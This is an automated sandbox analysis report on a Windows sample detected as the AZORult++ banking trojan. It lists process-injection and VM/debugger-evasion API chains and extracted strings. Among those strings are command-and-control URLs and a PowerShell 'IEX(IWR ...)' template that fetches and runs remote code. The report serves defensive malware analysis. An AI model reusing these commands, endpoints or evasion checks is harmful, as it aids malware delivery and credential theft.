Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe
Analysis ID: 1428896
MD5: 6d36580feee622f41b2ab6bfe79a8f5e
SHA1: 93e1cf1bb9ffa2d921d0402e6113ce50e6ed3bd7
SHA256: 3aa50555913747e4d6c5be45de96d771efea5f59251fd25a7746c0defcf12ba8
Tags: exe

Detection

AZORult++
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected AZORult++ Trojan
Multi AV Scanner detection for submitted file
Contains functionality to detect virtual machines
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Avira: detected
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe ReversingLabs: Detection: 52%
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B882F6 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW, 0_2_02B882F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B88310 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess, 0_2_02B88310
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B88F70 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_02B88F70
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B885F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_02B885F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B86670 HeapFree,ObtainUserAgentString,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,InternetOpenW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetQueryDataAvailable,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_02B86670
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe String found in binary or memory: http://79.124.78.45/hockamore.php
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657716656.000000000100E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://79.124.78.45/hockamore.php%temp%
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe String found in binary or memory: https://www.clubedasluluzinhasro.com.br/assets/image
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657716656.000000000100E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.clubedasluluzinhasro.com.br/assets/image/c

E-Banking Fraud

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B88E00 EntryPoint,GetUserDefaultLangID,ExitProcess, 0_2_02B88E00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B85AB0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle, 0_2_02B85AB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B85E10 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle, 0_2_02B85E10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_008FE87D 0_2_008FE87D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B885F0 0_2_02B885F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B84220 0_2_02B84220
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B84620 0_2_02B84620
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B824F0 0_2_02B824F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B87830 0_2_02B87830
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B87410 0_2_02B87410
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: String function: 008F3040 appears 46 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: String function: 008F4480 appears 33 times
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal88.bank.evad.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B861B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle, 0_2_02B861B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B86AA0 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString, 0_2_02B86AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Command line argument: jhl46745fghb 0_2_008F2F40
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe ReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Section loaded: sspicli.dll
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_008F1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect, 0_2_008F1300

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe 0_2_02B885F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_02B885F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe File opened / queried: C:\Windows\System32\VBoxService.exe
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B885F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_02B885F0
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657716656.000000000100E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: POST%s|%s|qE2PyNqQStart%d|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S%ComSpec% /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://79.124.78.45/hockamore.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://www.clubedasluluzinhasro.com.br/assets/image/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Binary or memory string: Hyper-V
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Binary or memory string: VMWare
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Binary or memory string: %systemroot%\System32\VBoxTray.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_008F695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_008F695B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_008F1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect, 0_2_008F1300
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_008F1710 mov ecx, dword ptr fs:[00000030h] 0_2_008F1710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_008F75A2 mov eax, dword ptr fs:[00000030h] 0_2_008F75A2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_008F9763 mov eax, dword ptr fs:[00000030h] 0_2_008F9763
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B87620 mov eax, dword ptr fs:[00000030h] 0_2_02B87620
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B85E10 mov eax, dword ptr fs:[00000030h] 0_2_02B85E10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_008FA845 GetProcessHeap, 0_2_008FA845
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_008F3D4E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_008F3D4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_008F421C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_008F421C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_008F43AF SetUnhandledExceptionFilter, 0_2_008F43AF

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B85AB0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle, 0_2_02B85AB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_008F44C5 cpuid 0_2_008F44C5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_008F4103 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_008F4103
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe Code function: 0_2_02B885F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_02B885F0
No contacted IP infos